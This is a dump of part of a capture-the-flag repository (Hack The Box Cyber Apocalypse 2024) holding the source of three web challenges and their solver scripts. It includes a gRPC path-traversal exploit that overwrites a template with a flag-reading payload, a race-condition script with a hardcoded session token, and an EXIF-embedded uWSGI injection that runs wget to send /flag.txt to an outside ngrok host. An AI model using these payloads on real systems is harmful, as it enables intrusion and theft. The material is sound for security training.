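// reachable: the service that writes the file has to validate the name
// itself, for example by resolving it and confirming that it stays inside
// the intended directory.
func (c *Client) SendTestimonial(customer, testimonial string) error {
	ctx := context.Background()
	// Filter bad characters.
	for _, char := range []string{"/", "\\", ":", "*", "?", "\"", "<", ">", "|", "."} {
		customer = strings.ReplaceAll(customer, char, "")
	}

	_, err := c.SubmitTestimonial(ctx, &pb.TestimonialSubmission{Customer: customer, Testimonial: testimonial})
	return err
}

// main submits the contents of pwn.go with a relative path in the customer
// field, then fetches the web front end and prints the returned HTML.
func main() {
	client, err := GetClient()
	if err != nil {
		fmt.Println("Failed to connect to server:", err)
		return
	}

	f, err := os.ReadFile("pwn.go")
	if err != nil {
		fmt.Println("Failed to read file:", err)
		return
	}

	fpath := "../../view/home/index.templ"
	fmt.Println("Sending testimonial from", fpath)
	// The generated RPC is called directly, so SendTestimonial's filter is
	// skipped. Capture the RPC error: the call's result used to be
	// discarded, which left the check below testing the stale (nil) error
	// from os.ReadFile.
	_, err = client.SubmitTestimonial(context.Background(), &pb.TestimonialSubmission{Customer: fpath, Testimonial: string(f)})
	if err != nil {
		fmt.Println("Failed to send testimonial:", err)
		return
	}

	url := "http://127.0.0.1:1337"
	htmlContent, err := getHTML(url)
	if err != nil {
		fmt.Println("Error:", err)
		return
	}

	fmt.Println("HTML Content:")
	fmt.Println(htmlContent)
}
--------------------------------------------------------------------------------
/web/[Easy] Testimonial/htb/solver/pb/ptypes.proto:
--------------------------------------------------------------------------------
1 | syntax = "proto3"; 2 | 3 | option go_package = "/pb"; 4 | 5 | service RickyService { 6 | rpc SubmitTestimonial(TestimonialSubmission) returns (GenericReply) {} 7 | } 8 | 9 | message TestimonialSubmission { 10 | string customer = 1; 11 | string testimonial = 2; 12 | } 13 | 14 | message GenericReply { 15 | string message = 1; 16 | }
--------------------------------------------------------------------------------
/web/[Easy] Testimonial/htb/solver/pb/ptypes_grpc.pb.go:
--------------------------------------------------------------------------------
1 | // Code generated by protoc-gen-go-grpc. DO NOT EDIT.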
2 | 3 | package pb 4 | 5 | import ( 6 | context "context" 7 | grpc "google.golang.org/grpc" 8 | codes "google.golang.org/grpc/codes" 9 | status "google.golang.org/grpc/status" 10 | ) 11 | 12 | // This is a compile-time assertion to ensure that this generated file 13 | // is compatible with the grpc package it is being compiled against. 14 | const _ = grpc.SupportPackageIsVersion7 15 | 16 | // RickyServiceClient is the client API for RickyService service. 17 | // 18 | // For semantics around ctx use and closing/ending streaming RPCs, please refer to https://pkg.go.dev/google.golang.org/grpc/?tab=doc#ClientConn.NewStream. 19 | type RickyServiceClient interface { 20 | SubmitTestimonial(ctx context.Context, in *TestimonialSubmission, opts ...grpc.CallOption) (*GenericReply, error) 21 | } 22 | 23 | type rickyServiceClient struct { 24 | cc grpc.ClientConnInterface 25 | } 26 | 27 | func NewRickyServiceClient(cc grpc.ClientConnInterface) RickyServiceClient { 28 | return &rickyServiceClient{cc} 29 | } 30 | 31 | func (c *rickyServiceClient) SubmitTestimonial(ctx context.Context, in *TestimonialSubmission, opts ...grpc.CallOption) (*GenericReply, error) { 32 | out := new(GenericReply) 33 | err := c.cc.Invoke(ctx, "/RickyService/SubmitTestimonial", in, out, opts...) 34 | if err != nil { 35 | return nil, err 36 | } 37 | return out, nil 38 | } 39 | 40 | // RickyServiceServer is the server API for RickyService service. 41 | // All implementations must embed UnimplementedRickyServiceServer 42 | // for forward compatibility 43 | type RickyServiceServer interface { 44 | SubmitTestimonial(context.Context, *TestimonialSubmission) (*GenericReply, error) 45 | mustEmbedUnimplementedRickyServiceServer() 46 | } 47 | 48 | // UnimplementedRickyServiceServer must be embedded to have forward compatible implementations. 
49 | type UnimplementedRickyServiceServer struct { 50 | } 51 | 52 | func (UnimplementedRickyServiceServer) SubmitTestimonial(context.Context, *TestimonialSubmission) (*GenericReply, error) { 53 | return nil, status.Errorf(codes.Unimplemented, "method SubmitTestimonial not implemented") 54 | } 55 | func (UnimplementedRickyServiceServer) mustEmbedUnimplementedRickyServiceServer() {} 56 | 57 | // UnsafeRickyServiceServer may be embedded to opt out of forward compatibility for this service. 58 | // Use of this interface is not recommended, as added methods to RickyServiceServer will 59 | // result in compilation errors. 60 | type UnsafeRickyServiceServer interface { 61 | mustEmbedUnimplementedRickyServiceServer() 62 | } 63 | 64 | func RegisterRickyServiceServer(s *grpc.Server, srv RickyServiceServer) { 65 | s.RegisterService(&_RickyService_serviceDesc, srv) 66 | } 67 | 68 | func _RickyService_SubmitTestimonial_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { 69 | in := new(TestimonialSubmission) 70 | if err := dec(in); err != nil { 71 | return nil, err 72 | } 73 | if interceptor == nil { 74 | return srv.(RickyServiceServer).SubmitTestimonial(ctx, in) 75 | } 76 | info := &grpc.UnaryServerInfo{ 77 | Server: srv, 78 | FullMethod: "/RickyService/SubmitTestimonial", 79 | } 80 | handler := func(ctx context.Context, req interface{}) (interface{}, error) { 81 | return srv.(RickyServiceServer).SubmitTestimonial(ctx, req.(*TestimonialSubmission)) 82 | } 83 | return interceptor(ctx, in, info, handler) 84 | } 85 | 86 | var _RickyService_serviceDesc = grpc.ServiceDesc{ 87 | ServiceName: "RickyService", 88 | HandlerType: (*RickyServiceServer)(nil), 89 | Methods: []grpc.MethodDesc{ 90 | { 91 | MethodName: "SubmitTestimonial", 92 | Handler: _RickyService_SubmitTestimonial_Handler, 93 | }, 94 | }, 95 | Streams: []grpc.StreamDesc{}, 96 | Metadata: "pb/ptypes.proto", 97 | } 98 | 
-------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/pwn.go: -------------------------------------------------------------------------------- 1 | package home 2 | 3 | import ( 4 | "htbchal/view/layout" 5 | "io/ioutil" 6 | "path/filepath" 7 | "strings" 8 | ) 9 | 10 | templ Index() { 11 | @layout.App(true) { 12 |
{pwn()}
13 | } 14 | } 15 | 16 | func pwn() string { 17 | files, err := ioutil.ReadDir("..") 18 | if err != nil { 19 | return "Error reading directory: " + err.Error() 20 | } 21 | 22 | var result string 23 | for _, file := range files { 24 | if strings.HasPrefix(file.Name(), "flag") && strings.HasSuffix(file.Name(), ".txt") { 25 | filePath := filepath.Join("..", file.Name()) 26 | content, err := ioutil.ReadFile(filePath) 27 | if err != nil { 28 | return "Error reading file: " + err.Error() 29 | } 30 | result += string(content) + "\n" 31 | } 32 | } 33 | 34 | return result 35 | } 36 | -------------------------------------------------------------------------------- /web/[Hard] Percetron/.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.toptal.com/developers/gitignore/api/node 2 | # Edit at https://www.toptal.com/developers/gitignore?templates=node 3 | 4 | ### Node ### 5 | # Logs 6 | logs 7 | *.log 8 | npm-debug.log* 9 | yarn-debug.log* 10 | yarn-error.log* 11 | lerna-debug.log* 12 | .pnpm-debug.log* 13 | 14 | # Diagnostic reports (https://nodejs.org/api/report.html) 15 | report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json 16 | 17 | # Runtime data 18 | pids 19 | *.pid 20 | *.seed 21 | *.pid.lock 22 | 23 | # Directory for instrumented libs generated by jscoverage/JSCover 24 | lib-cov 25 | 26 | # Coverage directory used by tools like istanbul 27 | coverage 28 | *.lcov 29 | 30 | # nyc test coverage 31 | .nyc_output 32 | 33 | # Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) 34 | .grunt 35 | 36 | # Bower dependency directory (https://bower.io/) 37 | bower_components 38 | 39 | # node-waf configuration 40 | .lock-wscript 41 | 42 | # Compiled binary addons (https://nodejs.org/api/addons.html) 43 | build/Release 44 | 45 | # Dependency directories 46 | node_modules/ 47 | jspm_packages/ 48 | 49 | # Snowpack dependency directory (https://snowpack.dev/) 50 | web_modules/ 51 | 52 | # TypeScript 
cache 53 | *.tsbuildinfo 54 | 55 | # Optional npm cache directory 56 | .npm 57 | 58 | # Optional eslint cache 59 | .eslintcache 60 | 61 | # Optional stylelint cache 62 | .stylelintcache 63 | 64 | # Microbundle cache 65 | .rpt2_cache/ 66 | .rts2_cache_cjs/ 67 | .rts2_cache_es/ 68 | .rts2_cache_umd/ 69 | 70 | # Optional REPL history 71 | .node_repl_history 72 | 73 | # Output of 'npm pack' 74 | *.tgz 75 | 76 | # Yarn Integrity file 77 | .yarn-integrity 78 | 79 | # dotenv environment variable files 80 | .env 81 | .env.development.local 82 | .env.test.local 83 | .env.production.local 84 | .env.local 85 | 86 | # parcel-bundler cache (https://parceljs.org/) 87 | .cache 88 | .parcel-cache 89 | 90 | # Next.js build output 91 | .next 92 | out 93 | 94 | # Nuxt.js build / generate output 95 | .nuxt 96 | dist 97 | 98 | # Gatsby files 99 | .cache/ 100 | # Comment in the public line in if your project uses Gatsby and not Next.js 101 | # https://nextjs.org/blog/next-9-1#public-directory-support 102 | # public 103 | 104 | # vuepress build output 105 | .vuepress/dist 106 | 107 | # vuepress v2.x temp and cache directory 108 | .temp 109 | 110 | # Docusaurus cache and generated files 111 | .docusaurus 112 | 113 | # Serverless directories 114 | .serverless/ 115 | 116 | # FuseBox cache 117 | .fusebox/ 118 | 119 | # DynamoDB Local files 120 | .dynamodb/ 121 | 122 | # TernJS port file 123 | .tern-port 124 | 125 | # Stores VSCode versions used for testing VSCode extensions 126 | .vscode-test 127 | 128 | # yarn v2 129 | .yarn/cache 130 | .yarn/unplugged 131 | .yarn/build-state.yml 132 | .yarn/install-state.gz 133 | .pnp.* 134 | 135 | ### Node Patch ### 136 | # Serverless Webpack directories 137 | .webpack/ 138 | 139 | # Optional stylelint cache 140 | 141 | # SvelteKit build / generate output 142 | .svelte-kit 143 | 144 | # End of https://www.toptal.com/developers/gitignore/api/node 145 | -------------------------------------------------------------------------------- /web/[Hard] 
Percetron/assets/about.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/about.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/addcert.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/addcert.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/admin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/admin.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/certificates.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/certificates.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/home.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/hosts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] 
Percetron/assets/hosts.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/login.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/management.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/management.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/op_msg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/op_msg.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/overview.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/register.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/register.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/smuggling.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/smuggling.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/smuggling2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/smuggling2.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/solved.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/solved.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/conf/haproxy.conf: -------------------------------------------------------------------------------- 1 | global 2 | log /dev/log local0 3 | log /dev/log local1 notice 4 | maxconn 4096 5 | user haproxy 6 | group haproxy 7 | defaults 8 | mode http 9 | timeout connect 5000 10 | timeout client 10000 11 | timeout server 10000 12 | frontend http-in 13 | bind *:1337 14 | default_backend forward_default 15 | backend forward_default 16 | http-request deny if { path -i -m beg /healthcheck-dev } # NOTE(review): this path-prefix deny at the proxy is the only guard for /healthcheck-dev visible in this config; the service on 127.0.0.1:3000 should enforce its own access check rather than rely on the proxy and the backend parsing every request identically 17 | server s1 127.0.0.1:3000 18 | -------------------------------------------------------------------------------- /web/[Hard] Percetron/conf/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | user=root 3 | nodaemon=true 4 | logfile=/dev/null 5 | logfile_maxbytes=0 6 | pidfile=/run/supervisord.pid 7 | 8 | [program:haproxy] 9 | command=haproxy -f /usr/local/etc/haproxy/haproxy.cfg 10 | directory=/app 11 | stdout_logfile=/dev/stdout 12 | stdout_logfile_maxbytes=0 13 |
stderr_logfile=/dev/stderr 14 | stderr_logfile_maxbytes=0 15 | 16 | [program:neo4j] 17 | command=/opt/neo4j/bin/neo4j start 18 | directory=/app 19 | stdout_logfile=/dev/stdout 20 | stdout_logfile_maxbytes=0 21 | stderr_logfile=/dev/stderr 22 | stderr_logfile_maxbytes=0 23 | 24 | [program:express] 25 | command=npm start 26 | directory=/app 27 | stdout_logfile=/dev/stdout 28 | stdout_logfile_maxbytes=0 29 | stderr_logfile=/dev/stderr 30 | stderr_logfile_maxbytes=0 -------------------------------------------------------------------------------- /web/[Hard] Percetron/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Secure entrypoint 4 | chmod 600 /entrypoint.sh 5 | 6 | # Set script variables: each secret is 32 hex characters (128 bits) read from /dev/urandom 7 | NEO4J_PASS=$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 32) 8 | SESSION_SECRET=$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 32) 9 | 10 | # Set environment variables. NOTE(review): /app/.env holds the session secret and the Neo4j password, and this script applies no chmod to it; consider restricting it to the account that runs the app 11 | echo "SESSION_SECRET=$SESSION_SECRET" > /app/.env 12 | echo "NEO4J_URI=bolt://127.0.0.1:7687" >> /app/.env 13 | echo "NEO4J_USER=neo4j" >> /app/.env 14 | echo "NEO4J_PASS=$NEO4J_PASS" >> /app/.env 15 | echo "MONGODB_URL=mongodb://127.0.0.1:27017/percetron" >> /app/.env 16 | 17 | # Set neo4j password (the value is passed unquoted as a command-line argument; it contains only hex characters) 18 | /opt/neo4j/bin/neo4j-admin dbms set-initial-password $NEO4J_PASS 19 | 20 | # Change flag name 21 | mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt 22 | 23 | # Create mongodb directory 24 | mkdir /tmp/mongodb 25 | 26 | # Run mongodb. NOTE(review): --noauth together with --bind_ip 0.0.0.0 accepts unauthenticated connections on every interface, while the MONGODB_URL written above only uses 127.0.0.1; binding to 127.0.0.1 would match that 27 | mongod --bind_ip 0.0.0.0 --noauth --dbpath /tmp/mongodb/ & 28 | 29 | until nc -z localhost 27017 30 | do 31 | sleep 1 32 | done 33 | 34 | # Launch supervisord 35 | /usr/bin/supervisord -c /etc/supervisord.conf 36 | -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/admhoem.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/admhoem.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/afterverified.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/afterverified.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/chrover.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/chrover.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/cook.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/cook.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/csrfdone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/csrfdone.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/cssexpl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/cssexpl.png 
-------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/email.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/email.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/flag.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/home.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/inbox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/inbox.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/info.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/login.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/login.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/proadd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/proadd.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/product.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/product.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/bot/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request 2 | from selenium import webdriver 3 | from selenium.webdriver.common.by import By 4 | from selenium.webdriver.chrome.options import Options 5 | import time, threading 6 | 7 | app = Flask(__name__) 8 | 9 | @app.route('/visit') 10 | def visit(): 11 | productID = request.args.get('productID') 12 | email = request.args.get('email') 13 | password = request.args.get('password') 14 | 15 | thread = threading.Thread(target=bot, args=(productID, email, password)) 16 | thread.start() 17 | return 'OK' 18 | 19 | def bot(productID, email, password): 20 | chrome_options = Options() 21 | 22 | prefs = { 23 | "download.prompt_for_download": True, 24 | "download.default_directory": "/dev/null" 25 | } 26 | 27 | chrome_options.add_experimental_option( 28 | "prefs", prefs 29 | ) 30 | chrome_options.add_argument('headless') 31 | chrome_options.add_argument('no-sandbox') 32 | 
chrome_options.add_argument('ignore-certificate-errors') 33 | chrome_options.add_argument('disable-dev-shm-usage') 34 | chrome_options.add_argument('disable-infobars') 35 | chrome_options.add_argument('disable-background-networking') 36 | chrome_options.add_argument('disable-default-apps') 37 | chrome_options.add_argument('disable-extensions') 38 | chrome_options.add_argument('disable-gpu') 39 | chrome_options.add_argument('disable-sync') 40 | chrome_options.add_argument('disable-translate') 41 | chrome_options.add_argument('hide-scrollbars') 42 | chrome_options.add_argument('metrics-recording-only') 43 | chrome_options.add_argument('no-first-run') 44 | chrome_options.add_argument('safebrowsing-disable-auto-update') 45 | chrome_options.add_argument('media-cache-size=1') 46 | chrome_options.add_argument('disk-cache-size=1') 47 | chrome_options.add_argument('disable-setuid-sandbox') 48 | chrome_options.add_argument('--js-flags=--noexpose_wasm,--jitless') 49 | 50 | client = webdriver.Chrome(options=chrome_options) 51 | 52 | client.get(f"https://127.0.0.1:1337/challenge/") 53 | 54 | time.sleep(3) 55 | client.find_element(By.ID, "email").send_keys(email) 56 | client.find_element(By.ID, "password").send_keys(password) 57 | client.execute_script("document.getElementById('login-btn').click()") 58 | 59 | time.sleep(3) 60 | client.get(f"https://127.0.0.1:1337/challenge/home") 61 | time.sleep(3) 62 | client.get(f"https://127.0.0.1:1337/challenge/product/{productID}") 63 | time.sleep(120) 64 | 65 | client.quit() 66 | 67 | if __name__ == '__main__': 68 | app.run(host='127.0.0.1', port=8082) -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/index.js: -------------------------------------------------------------------------------- 1 | const express = require('express'); 2 | const app = express(); 3 | const path = require('path'); 4 | const nunjucks = require('nunjucks'); 5 | const routes = require('./routes'); 6 | 
7 | nunjucks.configure('views', { 8 | autoescape: true, 9 | express: app 10 | }); 11 | 12 | app.set('views', './views'); 13 | app.use('/email/static', express.static(path.resolve('static'))); 14 | app.set('etag', false); 15 | 16 | app.use(routes()); 17 | 18 | app.all('*', (req, res) => { 19 | return res.status(404).send({ 20 | message: '404 page not found' 21 | }); 22 | }); 23 | 24 | (async () => { 25 | app.listen(8080, '0.0.0.0', () => console.log('Listening on port 8080')); 26 | })(); -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "email-app", 3 | "version": "1.0.0", 4 | "description": "A email client", 5 | "main": "index.js", 6 | "scripts": { 7 | "dev": "nodemon -e html,js,css index.js", 8 | "start": "node index.js" 9 | }, 10 | "keywords": [], 11 | "author": "Xclow3n", 12 | "license": "ISC", 13 | "dependencies": { 14 | "express": "^4.18.2", 15 | "mailhog": "^4.16.0", 16 | "nunjucks": "^3.2.4" 17 | }, 18 | "devDependencies": { 19 | "nodemon": "^3.0.3" 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/routes/index.js: -------------------------------------------------------------------------------- 1 | const express = require('express'); 2 | const router = express.Router(); 3 | const mailhog = require('mailhog')({ 4 | host: 'localhost', 5 | port: 9000 6 | }) 7 | 8 | router.get('/email/', async (req, res) => { 9 | const result = await mailhog.messages(0, 10) 10 | 11 | mails = [] 12 | 13 | for (let item of result.items) { 14 | if (item.to == 'test@email.htb') { 15 | mails.push(item); 16 | } 17 | } 18 | 19 | return res.render('home.html', {result: mails}); 20 | }); 21 | 22 | router.get('/email/deleteall', async (req, res)=> { 23 | const response = await mailhog.deleteAll() 24 | return 
res.redirect('/email/'); 25 | }) 26 | 27 | module.exports = () => { 28 | return router; 29 | }; -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/static/images/LaughtPepe.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/email-app/static/images/LaughtPepe.gif -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/views/home.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Mail Inbox 5 | 6 | 7 | 8 |
9 |
10 |
11 |
12 |

Inbox

13 | Delete all 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | {% for item in result %} 26 | 27 | 28 | 29 | 30 | 31 | 32 | {% endfor %} 33 | 34 |
FromToSubjectContent
{{ item.from }}{{ item.to }}{{ item.subject }}{{ item.text }}
35 |
36 |
37 |
38 | 39 |
40 |
41 |
42 |

Created by Xclow3n with

43 |
44 |
45 |
46 | 47 | 48 | -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/css_injection_csrf/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "compression": "^1.7.4", 4 | "connect": "^3.7.0", 5 | "express": "^4.18.2", 6 | "morgan": "^1.10.0", 7 | "nodemon": "^3.0.3", 8 | "socket.io": "^4.7.4", 9 | "websocket": "^1.0.34" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/genPDF.py: -------------------------------------------------------------------------------- 1 | from fpdf import FPDF 2 | from exiftool import ExifToolHelper 3 | 4 | with ExifToolHelper() as et: 5 | et.set_tags( 6 | ["test.jpeg"], 7 | tags={"model": " [uwsgi] foo = @(exec://wget https://f0af-2405-201-550b-ba5-3ca4-b505-692f-fdf0.ngrok-free.app?flag=$(cat /flag.txt)) "}, 8 | params=["-E", "-overwrite_original"] 9 | ) 10 | 11 | class MyFPDF(FPDF): 12 | pass 13 | 14 | pdf = MyFPDF() 15 | 16 | pdf.add_page() 17 | pdf.image('./test.jpeg') 18 | pdf.output('payload.pdf', 'F') -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/payload.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/htb/payload.pdf -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/solver.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import httpx 3 | import re 4 | import requests 5 | 6 | url = 'https://127.0.0.1:1337' 7 | cookies = {"session": 
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MiwiZXhwIjoxNzA5MzQ4ODQ4LCJhbnRpQ1NSRlRva2VuIjoiOTdlNGExMzEtOWZhNC00M2Y1LWEwMTYtZDU5MGVlMWU3ZWU0In0.J9ECzcfGTk6RPEAlW6Fo7o961266Gfe4O7_rSU0BOnE"} 8 | 9 | async def changeProfile(client, data): 10 | resp = await client.post(f'{url}/challenge/api/profile', cookies=cookies, data=data, headers={'Content-Type': 'application/x-www-form-urlencoded'}) 11 | return resp.text 12 | 13 | async def getEmail(session): 14 | r = await session.get(f'{url}/email/') 15 | res = r.text 16 | token_pattern = r'token=([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})' 17 | tokens = re.findall(token_pattern, res) 18 | for token in tokens: 19 | print(token) 20 | await session.get(f'{url}/email/deleteall') 21 | 22 | 23 | async def main(): 24 | async with httpx.AsyncClient(verify=False, http2=True) as client: 25 | tasks = [] 26 | for i in range(2): 27 | tasks.append(asyncio.ensure_future(changeProfile(client, data="email=test@apexsurvive.htb&username=test&fullName=test&antiCSRFToken=97e4a131-9fa4-43f5-a016-d590ee1e7ee4"))) 28 | tasks.append(asyncio.ensure_future(changeProfile(client, data="email=test@email.htb&username=test&fullName=test&antiCSRFToken=97e4a131-9fa4-43f5-a016-d590ee1e7ee4"))) 29 | tasks.append(asyncio.ensure_future(changeProfile(client, data="email=test@apexsurvive.htb&username=test&fullName=test&antiCSRFToken=97e4a131-9fa4-43f5-a016-d590ee1e7ee4"))) 30 | 31 | # Get responses 32 | results = await asyncio.gather(*tasks, return_exceptions=True) 33 | 34 | for r in results: 35 | print(r) 36 | 37 | # Async2sync sleep 38 | await asyncio.sleep(0.5) 39 | # await getEmail(client) 40 | 41 | # print(results) 42 | 43 | # Perform Race condition 44 | asyncio.run(main()) 45 | 46 | 47 | 